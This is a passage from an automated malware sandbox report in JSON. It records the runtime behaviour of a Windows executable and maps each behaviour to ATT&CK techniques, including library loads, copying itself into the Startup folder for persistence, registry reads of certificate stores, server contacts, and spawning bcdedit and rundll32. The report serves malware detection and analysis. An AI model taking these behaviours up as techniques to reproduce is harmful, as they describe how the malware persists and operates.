00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter bcrypt.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter gdiplus.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\\gdiplus.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter C:\\ntdll.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\rasapi32.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter rasapi32.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ws2_32.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter ws2_32.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter RASMAN.DLL (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter rtutils.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\winhttp.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter RPCRT4.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter NSI.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter CFGMGR32.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\en-US\\tzres.dll.mui (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\iphlpapi.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter iphlpapi.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\secur32.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter secur32.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter ncrypt.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\crypt32.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter crypt32.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\CRYPT32.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter CRYPT32.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter USERENV.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005808)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005288)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005288)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005288)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005288)\n \"bcdedit.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005376)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005364)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005364)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005364)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005364)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005500)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005500)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005500)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005500)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-2.dll\" - [base:0; Status:c0000135]\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" failed to load missing module \"api-ms-win-core-quirks-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll\" - [base:0; Status:c0000135]\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" failed to load missing module \"%WINDIR%\\system32\\combase.dll\" - [base:0; Status:c0000135]\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll\" - [base:0; Status:c0000135]\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\uxtheme.dll\" - [base:0; Status:c0000135]\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll\" - [base:0; Status:c0000135]\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" failed to load missing module \"C:\\ntdll.dll\" - [base:0; Status:c0000135]\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll\" - [base:0; Status:c0000135]\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll\" - [base:0; Status:c0000135]\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\rasapi32.dll\" - [base:0; Status:c0000135]\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ws2_32.dll\" - [base:0; Status:c0000135]\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\winhttp.dll\" - [base:0; Status:c0000135]\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\iphlpapi.dll\" - [base:0; Status:c0000135]\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\secur32.dll\" - [base:0; Status:c0000135]\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\crypt32.dll\" - [base:0; Status:c0000135]\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\CRYPT32.dll\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"bcdedit.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"bcdedit.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rundll32.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rundll32.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00005808)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"CopyFileW\" to copy C:\\9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe to new location %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup (UID: 00000000-00005808)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-17", "type": 3, "relevance": 10, "name": "Accesses System Certificates Settings", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\AUTOUPDATE\"; Key: \"DISALLOWEDCERTSYNCDELTATIME\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\MY\"; Key: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\"; Key: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\"; Key: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\2E4916B07F3DE90C8DDE2566FD9B9B400D89BBBA\"; Key: \"BLOB\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\5AEAEE3F7F2A9449CEBAFEEC68FDD184F20124A7\"; Key: \"BLOB\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\E6A3B45B062D509B3382282D196EFE97D5956CCB\"; Key: \"BLOB\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\F5AD0BCC1AD56CD150725B1C866C30AD92EF21B0\"; Key: \"BLOB\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\"; Key: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CTLS\"; Key: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\"; Key: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\"; Key: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\109F1CAED645BB78B3EA2B94C0697C740733031C\"; Key: \"BLOB\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-3", "type": 10, "name": "Loads the .NET runtime environment", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" at 63890000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 756E0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 752A0000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\CLR_PerfMon_WrapMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"\n \"RasPbFile\"\n \"Global\\CLR_PerfMon_WrapMutex\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 760A0000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 760A0000\n \"bcdedit.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 760A0000\n \"reg.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 760A0000\n \"rundll32.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 760A0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-7", "type": 10, "name": "Loads the CLR Loader DLL", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 644F0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 64CA0000", "origin": "Loaded Module", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:443\"\n \"<IPv4>:443\"\n \"<IPv4>:443\"\n \"<IPv4>:443\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-18", "type": 3, "relevance": 10, "name": "Accesses Software Policy Settings", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\"; Key: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\"; Key: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\"; Key: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CTLS\"; Key: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\"; Key: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\"; Key: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\"; Key: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CTLS\"; Key: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\"; Key: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\"; Key: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CRLS\"; Key: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CTLS\"; Key: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\"; Key: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: 